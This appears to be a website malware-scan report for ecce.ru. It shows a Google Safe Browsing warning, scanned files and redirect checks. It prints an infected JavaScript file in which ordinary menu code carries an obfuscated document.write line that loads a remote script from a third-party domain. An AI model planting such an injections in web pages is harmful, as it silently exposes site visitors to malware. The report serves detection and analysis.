Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecce.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ecce.ru/ | 200 OK Content-Length: 19387 Content-Type: text/html | clean |
http://ecce.ru/js/dsn.js | 200 OK Content-Length: 954 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var menus = new Array('news','about','service','partners','clients','job','contacts'); var services = new Array('bp','land','build','proekt','oc','zak'); var activeTab = ''; function setTabTo(obj) { for (var i = 0 ; i<menus.length ; i++ ) { var t = document.getElementById(menus[i] + 'Inn'); t.className = 'unactiveInn'; var t = document.getElementById(menus[i]); t.className = 'unactive'; } var objInn = document.getElementById(obj.id + return false; } function setServiceTo(obj) { for (var i = 0 ; i<services.length ; i++ ) { var t = document.getElementById(services[i] + 'Inn'); t.className = 'unactive'; } var objInn = document.getElementById(obj.id + 'Inn'); objInn.className = 'active'; obj.className = 'active'; return false; } document.write('<sc'+'ript type="text/javascript" src="http://greatrow.ru/Gigahertz.js"></scri'+'pt>'); Antivirus reports:
| ||
http://hairyplant.ru/Gigahertz.js | 500 Can't connect to hairyplant.ru:80 Content-Length: 188 Content-Type: text/plain | clean |
http://hairyplant.ru/test404page.js | 500 Can't connect to hairyplant.ru:80 Content-Length: 188 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecce.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 13:29:16 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: ecce.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 13:29:16 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecce.ru
Referer: http://www.google.com/search?q=ecce.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ecce.ru
Referer: http://www.google.com/search?q=ecce.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.